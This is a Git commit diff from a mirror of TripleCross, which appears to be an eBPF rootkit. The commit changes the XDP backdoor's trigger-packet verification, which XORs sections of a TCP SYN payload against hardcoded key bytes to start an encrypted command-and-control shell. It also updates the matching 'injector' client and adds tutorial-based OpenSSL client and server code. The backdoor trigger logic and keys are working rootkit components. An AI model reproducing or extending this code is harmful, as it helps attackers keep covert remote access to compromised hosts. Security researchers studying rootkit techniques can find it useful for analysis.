admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-21 17:23:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Fixed keys of trigger packet V1, added sample servers, fixed client bug

Browse Source
This commit is contained in:
h3xduck
2022-05-05 17:52:58 -04:00
parent 0553ad777f
commit 213e30ba3b
14 changed files with 1625 additions and 1104 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/kit.o
View File

Binary file not shown.

2146
src/.output/kit.skel.h
View File

File diff suppressed because it is too large Load Diff

6
src/Makefile
View File

@@ -87,17 +87,17 @@ $(patsubst %,$(OUTPUT)/%.o, $(APPS)): %.o: %.skel.h
#User includes and modules #User includes and modules
$(USER_INCLUDES_OBJ): $(wildcard $(USER_INCLUDES_SRC)/**/*.h) | $(OUTPUT) $(USER_INCLUDES_OBJ): $(wildcard $(USER_INCLUDES_SRC)/**/*.h) | $(OUTPUT)
$(call msg,CC,$@) $(call msg,CC,$@)
$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(USER_INCLUDES_SRC) -o $@ $(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -Wno-deprecated-declarations -c $(USER_INCLUDES_SRC) -o $@
#User code #User code
$(OUTPUT)/%.o: $(USER)/%.c $(wildcard $(USER)/*.h)| $(OUTPUT) $(OUTPUT)/%.o: $(USER)/%.c $(wildcard $(USER)/*.h)| $(OUTPUT)
$(call msg,CC,$@) $(call msg,CC,$@)
$(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(filter $(USER)/%.c,$^) -o $@ $(Q)$(CC) $(CFLAGS) $(INCLUDES) $(COMMON_INCLUDES) -c $(filter $(USER)/%.c,$^) -Wno-deprecated-declarations -o $@
# Build application binary # Build application binary
$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT) $(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT)
$(call msg,BINARY,$@) $(call msg,BINARY,$@)
$(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -o bin/$@ $(Q)$(CC) $(CFLAGS) $(INCLUDES) $^ -lelf -lbpf -lz -lssl -lcrypto -Wno-deprecated-declarations -o bin/$@
$(Q)rm $(USER_INCLUDES_OBJ) $(Q)rm $(USER_INCLUDES_OBJ)
tckit: $(abspath $(EBPF)/include/bpf)/tc.c tckit: $(abspath $(EBPF)/include/bpf)/tc.c

BIN
src/bin/kit
View File

Binary file not shown.

6
src/client/Makefile
View File

@@ -1,15 +1,15 @@
CC = gcc CC = gcc
HEADERS = lib/RawTCP.h HEADERS = lib/RawTCP.h include/sslserver.h
EXTRA_CFLAGS= -I$(PWD)/lib EXTRA_CFLAGS= -I$(PWD)/lib
default: default:
make injector make injector
client.o: client.c $(HEADERS) client.o: client.c $(HEADERS)
gcc -c client.c gcc -c -Wno-deprecated-declarations client.c
injector: client.o lib/libRawTCP_Lib.a injector: client.o lib/libRawTCP_Lib.a
gcc -lm -o injector client.o -L. lib/libRawTCP_Lib.a gcc -lm -o injector client.o -L/usr/lib -lssl -lcrypto -L. lib/libRawTCP_Lib.a
clean: clean:
-rm -f client.o -rm -f client.o

3
src/client/client.c
View File

@@ -13,6 +13,7 @@
#include "../common/constants.h" #include "../common/constants.h"
#include "../common/c&c.h" #include "../common/c&c.h"
#include "../common/protocol.h" #include "../common/protocol.h"
#include "include/sslserver.h"
// For printing with colors // For printing with colors
#define KGRN "\x1B[32m" #define KGRN "\x1B[32m"
@@ -205,7 +206,7 @@ void activate_command_control_shell_encrypted(char* argv){
char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1; char key1[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_1;
char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2; char key2[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_2;
//K3 with command to start the encrypted connection with the backdoor //K3 with command to start the encrypted connection with the backdoor
char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3 + CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1; char key3[CC_TRIGGER_SYN_PACKET_SECTION_LEN] = CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL;
char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN]; char result[CC_TRIGGER_SYN_PACKET_SECTION_LEN];
strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN); strncpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){ for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){

BIN
src/client/client.o
View File

Binary file not shown.

327
src/client/include/sslserver.h Normal file
View File

@@ -0,0 +1,327 @@
// This code is based from the following tutorial:
// https://aticleworld.com/ssl-server-client-using-openssl-in-c/
// gcc -Wall -o server server.c -L/usr/lib -lssl -lcrypto
// sudo ./server <portnum>
#include "openssl/err.h"
#include "openssl/ssl.h"
#include <arpa/inet.h>
#include <errno.h>
#include <malloc.h>
#include <netinet/in.h>
#include <resolv.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#define FAIL -1
#define USE_FUNCTIONS 0
void instructionsForPem(void) {
printf("\n");
printf("\n");
printf("Did you forget to create your mycert.pem file?\n");
printf("\n");
printf("Run: openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout "
"mycert.pem -out mycert.pem\n");
printf("\n");
printf("If you haven't, but that's my best guess of what has gone wrong..\n");
printf("\n");
printf("\n");
}
#if (USE_FUNCTIONS)
SSL_CTX *InitServerCTX(void) {
const SSL_METHOD *method;
SSL_CTX *ctx;
OpenSSL_add_all_algorithms(); /* load & register all cryptos, etc. */
SSL_load_error_strings(); /* load all error messages */
method = TLSv1_2_server_method(); /* create new server-method instance */
ctx = SSL_CTX_new(method); /* create new context from method */
if (ctx == NULL) {
ERR_print_errors_fp(stderr);
abort();
}
return ctx;
}
void LoadCertificates(SSL_CTX *ctx, const char *CertFile, const char *KeyFile) {
/* set the local certificate from CertFile */
if (SSL_CTX_use_certificate_file(ctx, CertFile, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
instructionsForPem();
abort();
}
/* set the private key from KeyFile (may be the same as CertFile) */
if (SSL_CTX_use_PrivateKey_file(ctx, KeyFile, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
instructionsForPem();
abort();
}
/* verify private key */
if (!SSL_CTX_check_private_key(ctx)) {
fprintf(stderr, "Private key does not match the public certificate\n");
abort();
}
}
// Create the SSL socket and intialize the socket address structure
int OpenListener(int port) {
int sd;
struct sockaddr_in addr;
sd = socket(PF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = INADDR_ANY;
if (bind(sd, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
perror("can't bind port");
abort();
}
if (listen(sd, 10) != 0) {
perror("Can't configure listening port");
abort();
}
return sd;
}
void ShowCerts(SSL *ssl) //? RBW
{
X509 *cert;
char *line;
cert = SSL_get_peer_certificate(ssl); /* Get certificates (if available) */
if (cert != NULL) {
printf("Server certificates:\n");
line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
printf("Subject: %s\n", line);
free(line);
line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
printf("Issuer: %s\n", line);
free(line);
X509_free(cert);
} else {
printf("No certificates.\n");
}
}
/* Serve the connection -- threadable */
void Servlet(SSL *ssl) {
char buf[1024] = {0};
int sd, bytes;
// this is my attempt to run HTTPS.. This is sort of the minimal header that
// seems to work. \r is absolutely necessary.
const char *szHelloWorld =
"HTTP/1.1 200 OK\r\n"
"Content-type: text/html\r\n"
"\r\n"
"<html>\n"
"<body>\n"
"<h1>So, this works, if you added a security exception to your web "
"browser</h1>\n"
"<h2>Or.... are using a genuine certificate.</h2>\n"
"<h3>This is using functions BTW..</h3>\n"
"</body>\n"
"</html>\n";
if (SSL_accept(ssl) == FAIL) /* do SSL-protocol accept */
{
ERR_print_errors_fp(stderr);
} else {
ShowCerts(ssl); /* get any certificates */
bytes = SSL_read(ssl, buf, sizeof(buf)); /* get request */
buf[bytes] = '\0';
printf("Client msg:\n[%s]\n", buf);
if (bytes > 0) {
printf("Reply with:\n[%s]\n", szHelloWorld);
SSL_write(ssl, szHelloWorld, strlen(szHelloWorld));
} else {
ERR_print_errors_fp(stderr);
}
}
sd = SSL_get_fd(ssl); /* get socket connection */
SSL_free(ssl); /* release SSL state */
close(sd); /* close connection */
}
#endif
int server_run(int argc, char **argv) {
SSL_CTX *ctx;
int server;
int portnum;
const char *szPemPublic = "mycert.pem";
const char *szPemPrivate = "mycert.pem";
#if (!(USE_FUNCTIONS))
const SSL_METHOD *method;
#endif
if (argc != 2) {
printf("Usage: %s <portnum>\n", argv[0]);
exit(0);
}
portnum = atoi(argv[1]);
if (portnum < 1024) {
if (getuid() != 0) {
printf("This program must be run as root/sudo user since your port # "
"(%d) is < 1024\n",
portnum);
exit(1);
}
}
SSL_library_init(); /* Initialize the SSL library */
#if (USE_FUNCTIONS)
ctx = InitServerCTX(); /* initialize SSL */
#else
// InitServerCTX ();
OpenSSL_add_all_algorithms(); /* load & register all cryptos, etc. */
SSL_load_error_strings(); /* load all error messages */
method = TLSv1_2_server_method(); /* create new server-method instance */
ctx = SSL_CTX_new(method); /* create new context from method */
if (ctx == NULL) {
ERR_print_errors_fp(stderr);
abort();
}
#endif
#if (USE_FUNCTIONS)
LoadCertificates(ctx, szPemPublic, szPemPrivate); /* load certs */
#else
/* set the local certificate from CertFile */
if (SSL_CTX_use_certificate_file(ctx, szPemPublic, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
instructionsForPem();
abort();
}
/* set the private key from KeyFile (may be the same as CertFile) */
if (SSL_CTX_use_PrivateKey_file(ctx, szPemPrivate, SSL_FILETYPE_PEM) <= 0) {
ERR_print_errors_fp(stderr);
instructionsForPem();
abort();
}
/* verify private key */
if (!SSL_CTX_check_private_key(ctx)) {
fprintf(stderr, "Private key does not match the public certificate\n");
abort();
}
#endif
#if (USE_FUNCTIONS)
server = OpenListener(portnum); /* create server socket */
#else
struct sockaddr_in addr;
server = socket(PF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(portnum);
addr.sin_addr.s_addr = INADDR_ANY;
if (bind(server, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
perror("can't bind port");
abort();
}
if (listen(server, 10) != 0) {
perror("Can't configure listening port");
abort();
}
#endif
for (;;) {
struct sockaddr_in addr;
socklen_t len = sizeof(addr);
SSL *ssl;
#if (!(USE_FUNCTIONS))
char buf[1024] = {0};
int sd, bytes;
// this is my attempt to run HTTPS.. This is sort of the minimal header that
// seems to work. \r is absolutely necessary.
const char *szHttpServerResponse =
"HTTP/1.1 200 OK\r\n"
"Content-type: text/html\r\n"
"\r\n"
"<html>\n"
"<body>\n"
"<h1>So, this works, if you added a security exception to your web "
"browser</h1>\n"
"<h2>Or.... are using a genuine certificate.</h2>\n"
"<h3>This is <u><i>NOT</i></u> using functions BTW..</h3>\n"
"</body>\n"
"</html>\n";
#endif
int client;
client = accept(server, (struct sockaddr *)&addr,
&len); /* accept connection as usual */
printf("Connection: %s:%d\n", inet_ntoa(addr.sin_addr),
ntohs(addr.sin_port));
ssl = SSL_new(ctx); /* get new SSL state with context */
SSL_set_fd(ssl, client); /* set connection socket to SSL state */
#if (USE_FUNCTIONS)
Servlet(ssl); /* service connection */
#else
if (SSL_accept(ssl) == FAIL) /* do SSL-protocol accept */
{
ERR_print_errors_fp(stderr);
} else {
X509 *cert;
char *line;
cert =
SSL_get_peer_certificate(ssl); /* Get certificates (if available) */
if (cert != NULL) {
printf("Server certificates:\n");
line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
printf("Subject: %s\n", line);
free(line);
line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
printf("Issuer: %s\n", line);
free(line);
X509_free(cert);
} else {
printf("No certificates.\n");
}
// ShowCerts (ssl); /* get any certificates */
bytes = SSL_read(ssl, buf, sizeof(buf)); /* get request */
buf[bytes] = '\0';
printf("Client msg:\n[%s]\n", buf);
if (bytes > 0) {
printf("Reply with:\n[%s]\n", szHttpServerResponse);
SSL_write(ssl, szHttpServerResponse, strlen(szHttpServerResponse));
} else {
ERR_print_errors_fp(stderr);
}
}
sd = SSL_get_fd(ssl); /* get socket connection */
SSL_free(ssl); /* release SSL state */
close(sd); /* close connection */
#endif
// break;
}
close(server); /* close server socket */
ERR_free_strings(); /* free memory from SSL_load_error_strings */
EVP_cleanup(); /* free memory from OpenSSL_add_all_algorithms */
SSL_CTX_free(ctx); /* release context */
return 0;
}

BIN
src/client/injector
View File

Binary file not shown.

3
src/common/c&c.h
View File

@@ -13,7 +13,8 @@
#define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10 #define CC_TRIGGER_SYN_PACKET_PAYLOAD_SIZE 0x10
#define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4" #define CC_TRIGGER_SYN_PACKET_KEY_1 "\x56\xA4"
#define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13" #define CC_TRIGGER_SYN_PACKET_KEY_2 "\x78\x13"
#define CC_TRIGGER_SYN_PACKET_KEY_3 "\x1F\x29" #define CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL "\x1F\x29"
#define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02 #define CC_TRIGGER_SYN_PACKET_SECTION_LEN 0x02

8
src/common/protocol.h
View File

@@ -2,13 +2,7 @@
#define __PROTOCOL_H #define __PROTOCOL_H
//V1 //V1
#define CC_PROT_COMMAND_ENCRYPTED_SHELL 0
//Value added to K3 to define command to send
#define CC_PROT_K3_TOTAL_DEFINED_KEYS_V1 1
#define CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1 0x00
//V2 //V2
struct trigger_t { struct trigger_t {

25
src/ebpf/include/xdp/backdoor.h
View File

@@ -26,7 +26,6 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
//Loading keys //Loading keys
__builtin_memcpy(key1, CC_TRIGGER_SYN_PACKET_KEY_1, CC_TRIGGER_SYN_PACKET_SECTION_LEN); __builtin_memcpy(key1, CC_TRIGGER_SYN_PACKET_KEY_1, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(key2, CC_TRIGGER_SYN_PACKET_KEY_2, CC_TRIGGER_SYN_PACKET_SECTION_LEN); __builtin_memcpy(key2, CC_TRIGGER_SYN_PACKET_KEY_2, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
__builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
//S1 XOR K1 //S1 XOR K1
__builtin_memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN); __builtin_memcpy(section, payload, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
@@ -56,21 +55,17 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
__builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN); __builtin_memcpy(section3, payload+0x0C, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
int correct = 1; int correct = 1;
int command_received = -1; int command_received = -1;
for(int jj=0; jj<CC_PROT_K3_TOTAL_DEFINED_KEYS_V1; jj++){ __builtin_memcpy(key3, CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL, CC_TRIGGER_SYN_PACKET_SECTION_LEN);
for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){ for(int ii=0; ii<CC_TRIGGER_SYN_PACKET_SECTION_LEN; ii++){
result3[ii] = section[ii] ^ section2[ii] ^ section3[ii]; result3[ii] = section[ii] ^ section2[ii] ^ section3[ii];
if(result3[ii]!=(key3[ii] + jj)){ if(result3[ii]!=(key3[ii])){
correct = 0; correct = 0;
}
} }
if(correct == 1){
//Found valid k3 value
command_received = jj;
break;
}
} }
if(correct == 0){ if(correct == 1){
//Found valid k3 value
command_received = CC_PROT_COMMAND_ENCRYPTED_SHELL;
}else{
bpf_printk("FAIL CHECK 3\n"); bpf_printk("FAIL CHECK 3\n");
return XDP_PASS; return XDP_PASS;
} }
@@ -79,7 +74,7 @@ static __always_inline int manage_backdoor_trigger_v1(char* payload, __u32 paylo
bpf_printk("Finished backdoor V1 check with success\n"); bpf_printk("Finished backdoor V1 check with success\n");
int pid = -1; //Received by network stack, just ignore int pid = -1; //Received by network stack, just ignore
switch(command_received){ switch(command_received){
case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1: case CC_PROT_COMMAND_ENCRYPTED_SHELL:
bpf_printk("Received request to start encrypted connection\n"); bpf_printk("Received request to start encrypted connection\n");
ring_buffer_send_backdoor_command(&rb_comm, pid, command_received); ring_buffer_send_backdoor_command(&rb_comm, pid, command_received);
break; break;

202
src/user/include/utils/network/ssl_client.h Normal file
View File

@@ -0,0 +1,202 @@
// This is based from:
// --------------------
// https://aticleworld.com/ssl-server-client-using-openssl-in-c/
// gcc -Wall -o client client.c -L/usr/lib -lssl -lcrypto
#include <errno.h>
#include <malloc.h>
#include <netdb.h>
#include <openssl/err.h>
#include <openssl/ssl.h>
#include <resolv.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#define LOCAL_ABORT() \
do { \
printf("Abort at %s:%d\n", __FILE__, __LINE__); \
abort(); \
} while (0)
#define USE_FUNCTIONS 0
#if (USE_FUNCTIONS)
int OpenConnection(const char *hostname, uint16_t port) {
int sd;
struct hostent *host;
struct sockaddr_in addr;
if ((host = gethostbyname(hostname)) == NULL) {
perror(hostname);
LOCAL_ABORT();
}
sd = socket(PF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = *(long *)(host->h_addr);
if (connect(sd, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
close(sd);
perror(hostname);
fprintf(stderr, "Is the server running, and on the correct port (%d)?\n",
port);
LOCAL_ABORT();
}
return sd;
}
SSL_CTX *InitCTX(void) {
const SSL_METHOD *method;
SSL_CTX *ctx;
OpenSSL_add_all_algorithms(); /* Load cryptos, et.al. */
SSL_load_error_strings(); /* Bring in and register error messages */
method = TLSv1_2_client_method(); /* Create new client-method instance */
ctx = SSL_CTX_new(method); /* Create new context */
if (ctx == NULL) {
ERR_print_errors_fp(stderr);
LOCAL_ABORT();
}
return ctx;
}
void ShowCerts(SSL *ssl) {
X509 *cert;
char *line;
cert = SSL_get_peer_certificate(ssl); /* get the server's certificate */
if (cert != NULL) {
printf("Server certificates:\n");
line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
printf("Subject: %s\n", line);
free(line); /* free the malloc'ed string */
line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
printf("Issuer: %s\n\n", line);
free(line); /* free the malloc'ed string */
X509_free(cert); /* free the malloc'ed certificate copy */
} else {
printf("Info: No client certificates configured.\n");
}
}
#endif
int clientrun(int argc, char **argv) {
SSL_CTX *ctx;
int server;
SSL *ssl;
static char buf[1024 * 1024];
int bytes;
char *hostname;
uint16_t portnum;
#if (!(USE_FUNCTIONS))
struct hostent *host;
struct sockaddr_in addr;
const SSL_METHOD *method;
#endif
if (argc != 3) {
printf("usage: %s <hostname> <portnum>\n", argv[0]);
exit(0);
}
// Initialize the SSL library
SSL_library_init();
hostname = argv[1];
portnum = atoi(argv[2]);
#if (USE_FUNCTIONS)
ctx = InitCTX();
server = OpenConnection(hostname, portnum);
#else
OpenSSL_add_all_algorithms(); /* Load cryptos, et.al. */
SSL_load_error_strings(); /* Bring in and register error messages */
method = TLSv1_2_client_method(); /* Create new client-method instance */
ctx = SSL_CTX_new(method); /* Create new context */
if (ctx == NULL) {
ERR_print_errors_fp(stderr);
LOCAL_ABORT();
}
if ((host = gethostbyname(hostname)) == NULL) {
perror(hostname);
LOCAL_ABORT();
}
server = socket(PF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(portnum);
addr.sin_addr.s_addr = *(long *)(host->h_addr);
if (connect(server, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
close(server);
perror(hostname);
fprintf(stderr, "Is the server running, and on the correct port (%d)?\n",
portnum);
LOCAL_ABORT();
}
#endif
ssl = SSL_new(ctx); /* create new SSL connection state */
SSL_set_fd(ssl, server); /* attach the socket descriptor */
if (SSL_connect(ssl) <= 0) /* perform the connection */
{
ERR_print_errors_fp(stderr);
} else {
#if (!(USE_FUNCTIONS))
X509 *cert;
char *line;
#endif
char szRequest[4096];
sprintf(szRequest,
"GET / HTTP/1.1\r\n"
"User-Agent: Wget/1.17.1 (linux-gnu)\r\n"
"Accept: */*\r\n"
"Accept-Encoding: identity\r\n"
"Host: %s:%d\r\n"
// "Connection: Keep-Alive\n"
"\r\n",
hostname, portnum);
printf("Sending:\n[%s]\n", szRequest);
printf("\n\nConnected with %s encryption\n", SSL_get_cipher(ssl));
#if (USE_FUNCTIONS)
ShowCerts(ssl); /* get any certs */
#else
cert = SSL_get_peer_certificate(ssl); /* get the server's certificate */
if (cert != NULL) {
printf("Server certificates:\n");
line = X509_NAME_oneline(X509_get_subject_name(cert), 0, 0);
printf("Subject: %s\n", line);
free(line); /* free the malloc'ed string */
line = X509_NAME_oneline(X509_get_issuer_name(cert), 0, 0);
printf("Issuer: %s\n\n", line);
free(line); /* free the malloc'ed string */
X509_free(cert); /* free the malloc'ed certificate copy */
} else {
printf("Info: No client certificates configured.\n");
}
#endif
SSL_write(ssl, szRequest, strlen(szRequest)); /* encrypt & send message */
bytes = SSL_read(ssl, buf, sizeof(buf)); /* get reply & decrypt */
buf[bytes] = 0;
printf("Received (%d bytes):\n[%s]\n", bytes, buf);
// second send.. - for my real web page, it comes in two parts.
// bytes = SSL_read (ssl, buf, sizeof (buf)); /* get reply & decrypt */
// buf[bytes] = 0;
// printf ("Received (%d bytes):\n[%s]\n", bytes, buf);
SSL_free(ssl); /* release connection state */
}
close(server); /* close socket */
SSL_CTX_free(ctx); /* release context */
return 0;
}

3
src/user/kit.c
View File

@@ -19,6 +19,7 @@
#include "include/utils/strings/regex.h" #include "include/utils/strings/regex.h"
#include "include/utils/structures/fdlist.h" #include "include/utils/structures/fdlist.h"
#include "include/modules/module_manager.h" #include "include/modules/module_manager.h"
#include "include/utils/network/ssl_client.h"
#define ABORT_IF_ERR(err, msg)\ #define ABORT_IF_ERR(err, msg)\
if(err<0){\ if(err<0){\
@@ -107,7 +108,7 @@ static int handle_rb_event(void *ctx, void *data, size_t data_size){
}else if(e->event_type == COMMAND){ }else if(e->event_type == COMMAND){
printf("%s COMMAND pid:%d code:%i\n", ts, e->pid, e->code); printf("%s COMMAND pid:%d code:%i\n", ts, e->pid, e->code);
switch(e->code){ switch(e->code){
case CC_PROT_K3_ENCRYPTED_SHELL_TRIGGER_V1: case CC_PROT_COMMAND_ENCRYPTED_SHELL:
printf("Starting encrypted connection\n"); printf("Starting encrypted connection\n");
break; break;